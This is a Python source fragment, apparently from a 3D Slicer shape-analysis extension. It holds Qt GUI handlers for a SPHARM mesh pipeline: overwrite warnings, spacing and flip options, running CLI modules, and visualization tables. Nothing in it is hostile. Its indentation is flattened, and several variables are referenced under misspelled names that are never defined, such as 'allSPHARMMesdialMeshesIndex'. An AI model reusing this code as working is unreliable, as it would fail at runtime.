self.tableWidget_ChoiceOfFlip.clear()
self.tableWidget_ChoiceOfFlip.setColumnCount(2)
self.tableWidget_ChoiceOfFlip.setHorizontalHeaderLabels([' Input Files ', ' Choice of Flip '])
self.tableWidget_ChoiceOfFlip.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_ChoiceOfFlip.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_ChoiceOfFlip.verticalHeader().setVisible(False)
# Visualization
self.CollapsibleButton_Visualization.setChecked(False)
self.CheckableComboBox_visualization.model().clear()
self.tableWidget_visualization.clear()
self.tableWidget_visualization.setColumnCount(2)
self.tableWidget_visualization.setHorizontalHeaderLabels([' VTK Files ', ' Visualization '])
self.tableWidget_visualization.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_visualization.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_visualization.verticalHeader().setVisible(False)
# Apply
if self.ApplyButton.text == "Cancel":
self.ApplyButton.click()
self.Logic.ProgressBar.hide()
if self.progressbars_layout:
self.CLIProgressBars.hide()
# Functions to recover the widget in the .ui file
def getWidget(self, objectName):
return self.findWidget(self.widget, objectName)
def findWidget(self, widget, objectName):
if widget.objectName == objectName:
return widget
else:
for w in widget.children():
resulting_widget = self.findWidget(w, objectName)
if resulting_widget:
return resulting_widget
return None
# Only one tab can be displayed at the same time:
# When one tab is opened all the other tabs are closed
def onSelectedCollapsibleButtonOpen(self, selectedCollapsibleButton):
if selectedCollapsibleButton.isChecked():
collapsibleButtonList = [self.CollapsibleButton_GroupProjectIO,
self.CollapsibleButton_SegPostProcess,
self.CollapsibleButton_GenParaMesh,
self.CollapsibleButton_ParaToSPHARMMesh,
self.CollapsibleButton_AdvancedPostProcessedSegmentation,
self.CollapsibleButton_AdvancedParametersToSPHARMMesh,
self.CollapsibleButton_Visualization,
self.CollapsibleButton_RigidAlignment]
for collapsibleButton in collapsibleButtonList:
collapsibleButton.setChecked(False)
selectedCollapsibleButton.setChecked(True)
#
# Group Project IO
#
def onInputDirectoryChanged(self):
inputDirectory = self.GroupProjectInputDirectory.directory
# Update of the input directory path
self.Logic.parameters.setInputDirectory(inputDirectory)
# Possible extensions
exts = [".gipl", ".gipl.gz", ".mgh", ".mgh,gz", ".nii", ".nii.gz",".nrrd", ".vtk", ".vtp", ".hdr", ".mhd"]
# Search cases and add the filename to a list
self.Logic.InputCases = []
for file in os.listdir(inputDirectory):
for ext in exts:
if file.endswith(ext):
self.Logic.InputCases.append(file)
if file.endswith(".nii") or file.endswith(".nii.gz"):
self.RescaleSegPostProcess.setCheckState(qt.Qt.Unchecked)
self.label_RescaleSegPostProcess.enabled = False
self.RescaleSegPostProcess.enabled = False
# Update of the output directory path
def onOutputDirectoryChanged(self):
outputDirectory = self.GroupProjectOutputDirectory.directory
self.Logic.parameters.setOutputDirectory(outputDirectory)
# Update of the debug parameter
def onDebug(self):
self.Logic.parameters.setDebug(self.Debug.checkState())
#
# Post Processed Segmentation
#
def onOverwriteFilesSegPostProcess(self):
# Update of the overwrite boolean for the Post Processed Segmentation step
self.Logic.parameters.setOverwriteSegPostProcess(self.OverwriteSegPostProcess.checkState())
if self.OverwriteSegPostProcess.checkState():
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>Applying the overwrite option to Post Processed Segmentation step will also apply to the next steps</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# Check the overwrite option for the next steps
self.OverwriteGenParaMesh.setCheckState(qt.Qt.Checked)
self.Logic.parameters.setOverwriteGenParaMesh(self.OverwriteGenParaMesh.checkState())
self.OverwriteParaToSPHARMMesh.setCheckState(qt.Qt.Checked)
self.Logic.parameters.setOverwriteParaToSPHARMMesh(self.OverwriteParaToSPHARMMesh.checkState())
def onSelectSpacing(self):
# Update of the rescale boolean for the Post Processed Segmentation step
self.Logic.parameters.setRescaleSegPostProcess(self.RescaleSegPostProcess.checkState())
# Enable/Disable the spacing x, y, and z parameters in the UI
self.label_sx.enabled = self.RescaleSegPostProcess.checkState()
self.label_sy.enabled = self.RescaleSegPostProcess.checkState()
self.label_sz.enabled = self.RescaleSegPostProcess.checkState()
self.sx.enabled = self.RescaleSegPostProcess.checkState()
self.sy.enabled = self.RescaleSegPostProcess.checkState()
self.sz.enabled = self.RescaleSegPostProcess.checkState()
# Update of the spacing x parameter for the Post Processed Segmentation step
def onSxValueChanged(self):
self.Logic.parameters.setSx(self.sx.value)
# Update of the spacing y parameter for the Post Processed Segmentation step
def onSyValueChanged(self):
self.Logic.parameters.setSy(self.sy.value)
# Update of the spacing z parameter for the Post Processed Segmentation step
def onSzValueChanged(self):
self.Logic.parameters.setSz(self.sz.value)
# Enable/Disable the label number value in the UI
def onSelectValueLabelNumber(self):
self.label_ValueLabelNumber.enabled = self.LabelState.checkState()
self.ValueLabelNumber.enabled = self.LabelState.checkState()
# Update of the label parameter for the Post Processed Segmentation step
def onLabelNumberValueChanged(self):
self.Logic.parameters.setLabelNumber(self.ValueLabelNumber.value)
#
# Generate Mesh Parameters
#
def onOverwriteFilesGenParaMesh(self):
# If the overwrite option for GenParaMesh is unchecked
if not self.OverwriteGenParaMesh.checkState():
# If the overwrite option for the previous step is checked, the overwrite option needs to be checked for this step too
if self.OverwriteSegPostProcess.checkState():
self.OverwriteGenParaMesh.setCheckState(qt.Qt.Checked)
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>The overwrite option need to be applied to this step as it is set for the previous step</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# If the overwrite option for GenParaMesh is checked
else:
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>Applying the overwrite option to Generate Mesh Parameters step will also apply to the next steps</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# Check the overwrite option for the next step
self.OverwriteParaToSPHARMMesh.setCheckState(qt.Qt.Checked)
self.Logic.parameters.setOverwriteParaToSPHARMMesh(self.OverwriteParaToSPHARMMesh.checkState())
# Update of the overwrite boolean for the Generate Mesh Parameters step
self.Logic.parameters.setOverwriteGenParaMesh(self.OverwriteGenParaMesh.checkState())
# Update of the iterations parameter for the Generate Mesh Parameters step
def onNumberofIterationsValueChanged(self):
self.Logic.parameters.setNumberofIterations(self.NumberofIterations.value)
#
# Parameters to SPHARM Mesh
#
def onOverwriteFilesParaToSPHARMMesh(self):
# If the overwrite option for ParaToSPHARMMesh is unchecked
if not self.OverwriteParaToSPHARMMesh.checkState():
# If the overwrite option for a previous step is checked, the overwrite option needs to be checked for this step too
if self.OverwriteSegPostProcess.checkState() or self.OverwriteGenParaMesh.checkState():
self.OverwriteParaToSPHARMMesh.setCheckState(qt.Qt.Checked)
# Message for the user
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("<p align='center'>The overwrite option need to be applied to this step as it is set for the previous step</p>")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
# Update of the overwrite boolean for the Parameters to SPHARM Mesh step
self.Logic.parameters.setOverwriteParaToSPHARMMesh(self.OverwriteParaToSPHARMMesh.checkState())
# Update of the sub-division parameter for the Parameters to SPHARM Mesh step
def onSubdivLevelValueChanged(self):
self.Logic.parameters.setSubdivLevelValue(self.SubdivLevelValue.value)
# Update of the SPHARM degree parameter for the Parameters to SPHARM Mesh step
def onSPHARMDegreeValueChanged(self):
self.Logic.parameters.setSPHARMDegreeValue(self.SPHARMDegreeValue.value)
# Update of the theta iteration parameter for the Parameters to SPHARM Mesh step
def onThetaIterationValueChanged(self):
self.Logic.parameters.setThetaIterationValue(self.thetaIterationValue.value)
# Update of the phi iteration parameter for the Parameters to SPHARM Mesh step
def onPhiIterationValueChanged(self):
self.Logic.parameters.setPhiIterationValue(self.phiIterationValue.value)
# Update of the medial mesh boolean for the Parameters to SPHARM Mesh step
def onMedialMeshValueChanged(self):
self.Logic.parameters.setMedialMesh(self.medialMesh.checkState())
#
# Advanced Post Processed Segmentation
#
def onSelectGaussianVariance(self):
# Update of the gaussian variance boolean for the Post Processed Segmentation step
self.Logic.parameters.setGaussianFiltering(self.GaussianFiltering.checkState())
# Enable/Disable the gaussian variance parameters in the UI
self.label_VarianceX.enabled = self.GaussianFiltering.checkState()
self.VarianceX.enabled = self.GaussianFiltering.checkState()
self.label_VarianceY.enabled = self.GaussianFiltering.checkState()
self.VarianceY.enabled = self.GaussianFiltering.checkState()
self.label_VarianceZ.enabled = self.GaussianFiltering.checkState()
self.VarianceZ.enabled = self.GaussianFiltering.checkState()
# Update of the variance x parameter for the Post Processed Segmentation step
def onVarianceXValueChanged(self):
self.Logic.parameters.setVarianceX(self.VarianceX.value)
# Update of the variance y parameter for the Post Processed Segmentation step
def onVarianceYValueChanged(self):
self.Logic.parameters.setVarianceY(self.VarianceY.value)
# Update of the variance z parameter for the Post Processed Segmentation step
def onVarianceZValueChanged(self):
self.Logic.parameters.setVarianceZ(self.VarianceZ.value)
#
# Advanced Parameters to SPHARM Mesh
#
def onEnableRegTemplate(self):
# Update of the registration template boolean for the Parameters to SPHARM Mesh step
self.Logic.parameters.setUseRegTemplate(self.useRegTemplate.checkState())
# Enable/Disable the registration template path in the UI
self.label_regTemplate.enabled = self.useRegTemplate.checkState()
self.regTemplate.enabled = self.useRegTemplate.checkState()
# Update of the registration template path for the Parameters to SPHARM Mesh step
def onRegTemplateValueChanged(self):
self.Logic.parameters.setRegTemplate(self.regTemplate.currentPath)
def onEnableFlipTemplate(self):
# Update of the flip template boolean for the Parameters to SPHARM Mesh step
self.Logic.parameters.setUseFlipTemplate(self.useFlipTemplate.checkState())
# Enable/Disable the flip template path in the UI
self.label_flipTemplate.enabled = self.useFlipTemplate.checkState()
self.flipTemplate.enabled = self.useFlipTemplate.checkState()
# Update of the flip template path for the Parameters to SPHARM Mesh step
def onFlipTemplateValueChanged(self):
self.Logic.parameters.setFlipTemplate(self.flipTemplate.currentPath)
# Update of the flip parameter for the Parameters to SPHARM Mesh step
def onChoiceOfFlipValueChanged(self):
self.Logic.parameters.setChoiceOfFlip(self.choiceOfFlip.currentIndex)
def onEnableFlipChoices(self):
# Update of the flip option boolean for the Parameters to SPHARM Mesh step
self.Logic.parameters.setSameFlipForAll(self.sameFlipForAll.checkState())
self.choiceOfFlip.enabled = self.sameFlipForAll.checkState()
self.tableWidget_ChoiceOfFlip.enabled = not self.sameFlipForAll.checkState()
if not self.sameFlipForAll.checkState():
self.fillTableForFlipOptions()
#
# Correspondence Improvement
#
def onFiducialsDirectoryChanged(self, directory):
self.Logic.parameters.setFiducialsDirectory(directory)
def onEnableRigidAlignment(self, enabled):
self.Logic.parameters.setRigidAlignmentEnabled(enabled)
#
# Apply CLIs
#
def onApplyButton(self):
# Run workflow
if not self.Logic.Node.IsBusy():
# Check the registration template file
if self.useRegTemplate.checkState():
if not os.path.exists(self.regTemplate.currentPath) or not self.regTemplate.currentPath.endswith(".vtk"):
slicer.util.errorDisplay("Invalid registration template file in Advanced Parameters to SPHARM Mesh Tab")
return
# Check the flip template file
if self.useFlipTemplate.checkState():
if not os.path.exists(self.flipTemplate.currentPath) or not self.flipTemplate.currentPath.endswith(".coef"):
slicer.util.errorDisplay("Invalid flip template file in Advanced Parameters to SPHARM Mesh Tab")
return
# Empty the output folders if the overwrite options are checked
self.Logic.cleanOutputFolders()
# Change the apply buttons
logging.info('Widget: Running ShapeAnalysisModule')
self.ApplyButton.setText("Cancel")
self.Logic.addObserver(self.Logic.Node, slicer.vtkMRMLCommandLineModuleNode().StatusModifiedEvent,
self.onLogicModified)
self.Logic.Node.SetStatus(self.Logic.Node.Scheduled)
self.Logic.allCaseStartTime = time.time()
self.Logic.ShapeAnalysisCases()
# Cancel Workflow
else:
logging.info("Widget: Cancelling ShapeAnalysisModule")
self.ApplyButton.setEnabled(False)
self.Logic.Cancel()
def onLogicModified(self, logic_node, event):
status = logic_node.GetStatusString()
logging.info('-- %s : ShapeAnalysisModule', status)
# if not busy (completed, error, cancelled)
if not logic_node.IsBusy():
self.Logic.removeObserver(logic_node, slicer.vtkMRMLCommandLineModuleNode().StatusModifiedEvent,
self.onLogicModified)
# Create Error Message
if status == 'Completed with errors' or status == 'Cancelled':
logging.error(self.Logic.ErrorMessage)
qt.QMessageBox.critical(slicer.util.mainWindow(),
'ShapeAnalysisModule',
self.Logic.ErrorMessage)
elif status == 'Completed':
self.Logic.improveCorrespondence()
self.configurationVisualization()
# Empty lists
self.Logic.pipeline = {}
self.Logic.completed = {}
# Change the apply buttons
self.ApplyButton.setEnabled(True)
self.ApplyButton.setText("Run ShapeAnalysisModule")
# if running, create some progress bars for each cases
elif status == 'Running':
self.Logic.ProgressBar.show()
if self.progressbars_layout:
self.CLIProgressBars.hide()
self.CLIProgressBars = ctk.ctkCollapsibleGroupBox()
self.CLIProgressBars.setTitle('Detail')
self.progress_layout.addWidget(self.CLIProgressBars)
self.progressbars_layout = qt.QVBoxLayout(self.CLIProgressBars)
for i in range(len(self.Logic.pipeline)):
self.progressbars_layout.addWidget(self.Logic.pipeline[i].ProgressBar)
# Function to update the checkable comboBox and the table's checkboxes in the visualization tab according to the state of one checkbox of the checkable comboBox
def onCheckableComboBoxValueChanged(self):
currentText = self.CheckableComboBox_visualization.currentText
currentIndex = self.CheckableComboBox_visualization.currentIndex
currentItem = self.CheckableComboBox_visualization.model().item(currentIndex, 0)
# ******* Update the CheckableComboBox ******* #
# Check/Uncheck the "Case i: case_name [..]" checkboxes in the checkacle comboBox
if currentText == "All Models":
self.checkedItems("SPHARM", currentItem.checkState())
elif currentText == "All SPHARM Models":
self.checkedItems("SPHARM Models", currentItem.checkState())
elif currentText == "All SPHARM Ellipse Aligned Models":
self.checkedItems("SPHARM Ellipse Aligned Models", currentItem.checkState())
elif currentText == "All SPHARM Medial Meshes":
self.checkedItems("SPHARM Medial Meshes", currentItem.checkState())
elif currentText == "All SPHARM Procrustes Aligned Models":
self.checkedItems("SPHARM Procrustes Aligned Models", currentItem.checkState())
# Check/Uncheck the "All [..]" checkboxes in the checkacle comboBox
self.checkedAllItems()
self.CheckableComboBox_visualization.blockSignals(False)
# ******* Update the checkboxes in the table ******* #
for row in range(0, self.tableWidget_visualization.rowCount):
actionOnCheckBox = False
label = self.tableWidget_visualization.cellWidget(row, 0)
outputRootname = label.text
if currentText == "All Models":
actionOnCheckBox = True
elif currentText == "All SPHARM Models":
if not outputRootname.find("SPHARM") == -1 and outputRootname.find("SPHARM_ellalign") == -1 and outputRootname.find("SPHARMMedialMesh") == -1 and outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
elif currentText == "All SPHARM Ellipse Aligned Models":
if not outputRootname.find("SPHARM_ellalign") == -1:
actionOnCheckBox = True
elif currentText == "All SPHARM Medial Meshes":
if not outputRootname.find("SPHARMMedialMesh") == -1:
actionOnCheckBox = True
elif currentText == "All SPHARM Procrustes Aligned Models":
if not outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
else:
for inputFilename in self.Logic.InputCases:
inputRootname = inputFilename.split('/')[-1].split('.')[0]
if not currentText.find(inputRootname) == -1:
if not currentText.find("SPHARM Models") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARM") == -1 and outputRootname.find("SPHARM_ellalign") == -1 and outputRootname.find("SPHARMMedialMesh") == -1 and outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
elif not currentText.find("SPHARM Ellipse Aligned Models") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARM_ellalign") == -1:
actionOnCheckBox = True
elif not currentText.find("SPHARM Medial Meshes") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARMMedialMesh") == -1:
actionOnCheckBox = True
elif not currentText.find("SPHARM Procrustes Aligned Models") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
# check/uncheck the checkBox at (row,1)
if actionOnCheckBox:
widget = self.tableWidget_visualization.cellWidget(row, 1)
children = widget.children()
checkBox = children[1]
checkBox.blockSignals(True)
item = self.CheckableComboBox_visualization.model().item(currentIndex, 0)
if item.checkState():
checkBox.setChecked(True)
else:
checkBox.setChecked(False)
checkBox.blockSignals(False)
# Function to update the checkboxes of the checkable comboBox in the visualization tab according to the state of a checkbox of the table
def onCheckBoxTableValueChanged(self):
self.CheckableComboBox_visualization.blockSignals(True)
table = self.tableWidget_visualization
allSPHARMMesdialMeshesIndex = self.CheckableComboBox_visualization.findText("All SPHARM Medial Meshes") # If == -1 "All SPHARM Medial Meshes" checkBox doesn't exist
allSPHARMProcrustesAlignedModelsIndex = self.CheckableComboBox_visualization.findText("All SPHARM Procrustes Aligned Models") # If == -1 "All SPHARM Procrustes Aligned Models" checkBox doesn't exist
for i in range(len(self.Logic.InputCases)):
allCaseSPHARMModelsChecked = True
allCaseSPHARMEllalignModelsChecked = True
allCaseSPHARMMedialMeshesChecked = True
allCaseSPHARMProcrustesAlignedModelsChecked = True
inputRootname = self.Logic.InputCases[i].split('/')[-1].split('.')[0]
for row in range(0,table.rowCount):
label = table.cellWidget(row, 0)
outputRootname = label.text
if not outputRootname.find(inputRootname) == -1:
widget = table.cellWidget(row, 1)
children = widget.children()
checkBox = children[1]
if not checkBox.checkState():
if not outputRootname.find("SPHARM") == -1 and outputRootname.find("SPHARM_ellalign") == -1 and outputRootname.find("SPHARMMedialMesh") == -1 and outputRootname.find("SPHARM_procalign") == -1:
allCaseSPHARMModelsChecked = False
if not outputRootname.find("SPHARM_ellalign") == -1:
allCaseSPHARMEllalignModelsChecked = False
if not allSPHARMMedialMeshesIndex == -1:
if not outputRootname.find("SPHARMMedialMesh") == -1:
allCaseSPHARMMedialMeshesChecked = False
if not allSPHARMProcrustesAlignedModelsIndex == -1:
if not outputRootname.find("SPHARM_procalign") == -1:
allCaseSPHARMProcrustesAlignedModelsChecked = False
# Check/uncheck the case checkboxes according to the checkboxes of the table
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Models"
self.checkedCaseItem(text, allCaseSPHARMModelsChecked)
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Ellipse Aligned Models"
self.checkedCaseItem(text, allCaseSPHARMEllalignModelsChecked)
if not allSPHARMMedialMeshesIndex == -1:
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Medial Meshes"
self.checkedCaseItem(text, allCaseSPHARMMedialMeshesChecked)
if not allSPHARMProcrustesAlignedModelsIndex == -1:
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Procrustes Aligned Models"
self.checkedCaseItem(text, allCaseSPHARMProcrustesAlignedModelsChecked)
# Check/Uncheck the "All [..]" checkboxes in the checkacle comboBox
self.checkedAllItems()
self.CheckableComboBox_visualization.blockSignals(False)
# Visualization of the SPHARM Mesh outputs in Shape Population Viewer
def onSPHARMMeshesVisualizationInSPV(self):
# Creation of a CSV file to load the vtk files in ShapePopulationViewer
filePathCSV = slicer.app.temporaryPath + '/' + 'PreviewForVisualizationInSPV.csv'
self.Logic.creationCSVFileForSPV(self.tableWidget_visualization, filePathCSV)
if isinstance(slicer.modules.shapepopulationviewer, slicer.qSlicerCLIModule):
# Creation of the parameters of SPV
parameters = {}
parameters["CSVFile"] = filePathCSV
# Launch SPV
slicer.cli.run(slicer.modules.shapepopulationviewer, None, parameters, wait_for_completion=True)
else:
# Load CSV and select modules
slicer.modules.shapepopulationviewer.widgetRepresentation().loadCSVFile(filePathCSV)
slicer.util.selectModule(slicer.modules.shapepopulationviewer)
# Deletion of the CSV file in the Slicer temporary directory
if os.path.exists(filePathCSV):
os.remove(filePathCSV)
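# Note: ShapePopulationViewer may be provided either as a CLI module or as a
# loadable module; the isinstance check above selects the matching invocation.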
# Function to fill the flip options table for all the SPHARM mesh outputs
# - Column 0: rootname of the input file
# - Column 1: comboBox with the flip corresponding to the output file
def fillTableForFlipOptions(self):
table = self.tableWidget_ChoiceOfFlip
row = 0
for basename in self.Logic.InputCases:
table.setRowCount(row + 1)
# Column 0:
rootname = basename.split('/')[-1].split('.')[0]
labelVTKFile = qt.QLabel(rootname)
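# 0x84 = qt.Qt.AlignHCenter (0x04) | qt.Qt.AlignVCenter (0x80); the same constant is used for cell alignment throughout this file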
labelVTKFile.setAlignment(0x84)
table.setCellWidget(row, 0, labelVTKFile)
# Column 1:
widget = qt.QWidget()
layout = qt.QHBoxLayout(widget)
comboBox = qt.QComboBox()
comboBox.addItems(['No Flip',
'Flip Along Axis of x and y',
'Flip Along Axis of y and z',
'Flip Along Axis of x and z',
'Flip Along Axis of x',
'Flip Along Axis of y',
'Flip Along Axis of x, y and z',
'Flip Along Axis of z',
'All'])
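# The item order matches the finalFlipIndex values passed to ParaToSPHARMMesh
# in setup() below (0 = No Flip, 1-7 = the individual flips, 8 = All)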
comboBox.setCurrentIndex(self.choiceOfFlip.currentIndex)
layout.addWidget(comboBox)
layout.setAlignment(0x84)
layout.setContentsMargins(0, 0, 0, 0)
widget.setLayout(layout)
table.setCellWidget(row, 1, widget)
row = row + 1
# Function to configure the checkable comboBox and the table of the visualization tab
def configurationVisualization(self):
# Configuration of the checkable comboBox
checkableComboBox = self.CheckableComboBox_visualization
# clean the checkable comboBox
model = checkableComboBox.model()
model.clear()
# Add items according to the SPHARM meshes computed by ParaToSPHARMMesh
checkableComboBox.blockSignals(True)
checkableComboBox.addItem("All Models")
checkableComboBox.addItem("All SPHARM Models")
checkableComboBox.addItem("All SPHARM Ellipse Aligned Models")
if self.medialMesh.checkState():
checkableComboBox.addItem("All SPHARM Medial Meshes")
if self.useRegTemplate.checkState():
checkableComboBox.addItem("All SPHARM Procrustes Aligned Models")
# Fill the checkable comboBox
for i in range(len(self.Logic.InputCases)):
rootname = self.Logic.InputCases[i].split('/')[-1].split('.')[0]
checkableComboBox.addItem("Case " + str(i) + ": " + rootname + " - SPHARM Models")
checkableComboBox.addItem("Case " + str(i) + ": " + rootname + " - SPHARM Ellipse Aligned Models")
if self.medialMesh.checkState():
checkableComboBox.addItem("Case " + str(i) + ": " + rootname + " - SPHARM Medial Meshes")
if self.useRegTemplate.checkState():
checkableComboBox.addItem("Case " + str(i) + ": " + rootname + " - SPHARM Procrustes Aligned Models")
checkableComboBox.blockSignals(False)
# Configuration of the table
# column 0: rootname of the SPHARM Meshes generated by ParaToSPHARMMesh
# column 1: checkbox allowing the user to select which outputs to display in Shape Population Viewer
table = self.tableWidget_visualization
outputDirectory = self.GroupProjectOutputDirectory.directory
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh/"
row = 0
for filename in os.listdir(SPHARMMeshOutputDirectory):
if filename.endswith(".vtk") and not filename.endswith("_para.vtk") and not filename.endswith("SPHARMMedialAxis.vtk"):
table.setRowCount(row + 1)
# Column 0:
labelVTKFile = qt.QLabel(os.path.splitext(filename)[0])
labelVTKFile.setAlignment(0x84)
table.setCellWidget(row, 0, labelVTKFile)
# Column 1:
widget = qt.QWidget()
layout = qt.QHBoxLayout(widget)
checkBox = qt.QCheckBox()
layout.addWidget(checkBox)
layout.setAlignment(0x84)
layout.setContentsMargins(0, 0, 0, 0)
widget.setLayout(layout)
table.setCellWidget(row, 1, widget)
checkBox.connect('stateChanged(int)', self.onCheckBoxTableValueChanged)
row = row + 1
# Functions to update the checkable comboBox in the visualization tab
# Check/Uncheck checkBoxes with the label 'text'
def checkedItems(self, text, checkState):
model = self.CheckableComboBox_visualization.model()
for i in range(1, model.rowCount()):
item = model.item(i, 0)
if not item.text().find(text) == -1:
item.setCheckState(checkState)
# Check/Uncheck "All [..]" checkBoxes in the checkable comboBox
def checkedAllItems(self):
model = self.CheckableComboBox_visualization.model()
allIndex = self.CheckableComboBox_visualization.findText("All Models")
allItem = model.item(allIndex, 0)
allSPHARMIndex = self.CheckableComboBox_visualization.findText("All SPHARM Models")
allSPHARMItem = model.item(allSPHARMIndex, 0)
allSPHARMEllalignIndex = self.CheckableComboBox_visualization.findText("All SPHARM Ellipse Aligned Models")
allSPHARMEllalignItem = model.item(allSPHARMEllalignIndex, 0)
allSPHARMMedialMeshesIndex = self.CheckableComboBox_visualization.findText("All SPHARM Medial Meshes")
if not allSPHARMMedialMeshesIndex == -1:
allSPHARMMedialMeshesItem = model.item(allSPHARMMedialMeshesIndex, 0)
allSPHARMProcrustesAlignedModelsIndex = self.CheckableComboBox_visualization.findText("All SPHARM Procrustes Aligned Models")
if not allSPHARMProcrustesAlignedModelsIndex == -1:
allSPHARMProcrustesAlignedModelsItem = model.item(allSPHARMProcrustesAlignedModelsIndex, 0)
# Check/Uncheck "All SPHARM Models" checkBox
self.checkedAllItem("- SPHARM Models", allSPHARMItem)
# Check/Uncheck "All SPHARM Ellipse Aligned Models" checkBox
self.checkedAllItem("- SPHARM Ellipse Aligned Models", allSPHARMEllalignItem)
# Check/Uncheck "All SPHARM Medial Mesh" checkBox
if not allSPHARMMesdialMeshesIndex == -1:
self.checkedAllItem("- SPHARM Medial Meshes", allSPHARMMesdialMeshesItem)
# Check/Uncheck "All SPHARM Procrustes Aligned Models" checkBox
if not allSPHARMProcrustesAlignedModelsIndex == -1:
self.checkedAllItem("- SPHARM Procrustes Aligned Models", allSPHARMProcrustesAlignedModelsItem)
# Check/Uncheck "All Models" checkBox
if allSPHARMEllalignItem.checkState() and allSPHARMItem.checkState():
if allSPHARMMedialMeshesIndex == -1 and allSPHARMProcrustesAlignedModelsIndex == -1:
allItem.setCheckState(qt.Qt.Checked)
return
elif not allSPHARMMedialMeshesIndex == -1 and not allSPHARMProcrustesAlignedModelsIndex == -1:
if allSPHARMMedialMeshesItem.checkState() and allSPHARMProcrustesAlignedModelsItem.checkState():
allItem.setCheckState(qt.Qt.Checked)
return
elif not allSPHARMMedialMeshesIndex == -1 and allSPHARMProcrustesAlignedModelsIndex == -1:
if allSPHARMMedialMeshesItem.checkState():
allItem.setCheckState(qt.Qt.Checked)
return
elif allSPHARMMedialMeshesIndex == -1 and not allSPHARMProcrustesAlignedModelsIndex == -1:
if allSPHARMProcrustesAlignedModelsItem.checkState():
allItem.setCheckState(qt.Qt.Checked)
return
allItem.setCheckState(qt.Qt.Unchecked)
# Check/Uncheck "Case i: case_name - SPHARM [..]" checkBox in the checkable comboBox
def checkedCaseItem(self, text, doCheck):
model = self.CheckableComboBox_visualization.model()
item = model.findItems(text)[0]
if doCheck:
item.setCheckState(qt.Qt.Checked)
else:
item.setCheckState(qt.Qt.Unchecked)
# Check/Uncheck "All [..]" (except "All Models") checkBox in the checkable comboBox
def checkedAllItem(self, text, item):
if self.areAllCasesChecked(text):
item.setCheckState(qt.Qt.Checked)
else:
item.setCheckState(qt.Qt.Unchecked)
# Specify if all the "Case i: case_name - SPHARM [..]" checkBoxes of one type of Model are checked
def areAllCasesChecked(self, text):
model = self.CheckableComboBox_visualization.model()
isChecked = True
for i in range(3, model.rowCount()):
item = model.item(i, 0)
if not item.text().find(text) == -1:
if not item.checkState():
isChecked = False
return isChecked
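# Note: _setSectionResizeMode (used below) is assumed to be a small
# compatibility helper defined elsewhere in this file, wrapping
# QHeaderView.setResizeMode() (Qt4) and QHeaderView.setSectionResizeMode() (Qt5).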
def clearFlipOptionsTable(self):
table = self.tableWidget_ChoiceOfFlip
table.clear()
table.setColumnCount(2)
table.setHorizontalHeaderLabels([' Files ', ' Choice of Flip '])
table.setColumnWidth(0, 400)
horizontalHeader = table.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
table.verticalHeader().setVisible(False)
#
# ShapeAnalysisModuleParameters
#
class ShapeAnalysisModuleParameters(object):
def __init__(self):
#
self.waitForCompletion = False
# Group Project IO
self.inputDirectory = " "
self.outputDirectory = " "
self.debug = False
# Post Processed Segmentation
self.OverwriteSegPostProcess = False
self.RescaleSegPostProcess = True
self.sx = 0.5
self.sy = 0.5
self.sz = 0.5
self.labelNumber = 0
# Generate Mesh Parameters
self.OverwriteGenParaMesh = False
self.NumberofIterations = 1000
# Parameters to SPHARM Mesh
self.OverwriteParaToSPHARMMesh = False
self.SubdivLevelValue = 10
self.SPHARMDegreeValue = 15
self.thetaIterationValue = 100
self.phiIterationValue = 100
self.medialMesh = False
self.tableWidget_ChoiceOfFlip = None
# Advanced Post Processed Segmentation
self.GaussianFiltering = False
self.VarianceX = 10
self.VarianceY = 10
self.VarianceZ = 10
# Advanced Parameters to SPHARM Mesh
self.useRegTemplate = False
self.regTemplate = " "
self.useFlipTemplate = False
self.flipTemplate = " "
self.choiceOfFlip = 0
self.sameFlipForAll = True
# RigidAlignment Parameters
self.rigidAlignmentEnabled = False
self.fiducialsDirectory = " "
def setWaitForCompletion(self, flag):
self.waitForCompletion = flag
def setInputDirectory(self, path):
self.inputDirectory = path
def setOutputDirectory(self, path):
self.outputDirectory = path
def setDebug(self, flag):
self.debug = flag
def setOverwriteSegPostProcess(self, flag):
self.OverwriteSegPostProcess = flag
